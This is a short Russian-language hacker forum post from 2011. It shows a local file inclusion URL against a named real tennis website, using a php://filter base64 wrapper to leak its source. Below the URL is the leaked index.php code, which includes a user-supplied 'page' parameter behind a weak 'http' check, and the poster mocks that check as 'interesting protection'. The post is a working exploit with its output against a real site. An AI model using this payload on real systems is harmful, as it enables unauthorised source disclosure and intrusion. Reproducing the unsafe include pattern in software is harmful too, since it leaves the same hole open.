21.03.2011, 03:00
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
http://www.matchplaytennis.com/index.php?page=php://filter/convert.base64-encode/resource=index
PHP код:
[COLOR="#000000"]
[COLOR="#0000BB"]';
/*
Check for the page variable. If it is empty or
uninitialized, set it value to the default or
home page.
*/
[/COLOR][COLOR="#007700"]if ( isset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'page'[/COLOR][COLOR="#007700"]]) || !empty([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'page'[/COLOR][COLOR="#007700"]]) )
{
[/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'page'[/COLOR][COLOR="#007700"]];
}else{
[/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"home"[/COLOR][COLOR="#007700"];
}
[/COLOR][COLOR="#0000BB"]$sanitycheck[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]strpos[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"http"[/COLOR][COLOR="#007700"]);
if ([/COLOR][COLOR="#0000BB"]$sanitycheck[/COLOR][COLOR="#007700"]===[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#FF8000"]// Include the specified page.
//include(realpath(basename($page)));
[/COLOR][COLOR="#007700"]include([/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]".php"[/COLOR][COLOR="#007700"]);
}
else {
die([/COLOR][COLOR="#DD0000"]"Possible PHP Injection Attack"[/COLOR][COLOR="#007700"]);
}
[/COLOR][COLOR="#FF8000"]//echo "";
// Diplay the footer
[/COLOR][COLOR="#007700"]require_once([/COLOR][COLOR="#DD0000"]"footer.php"[/COLOR][COLOR="#007700"]);
?
[/COLOR][/COLOR]
интересная протекция ) |
|
|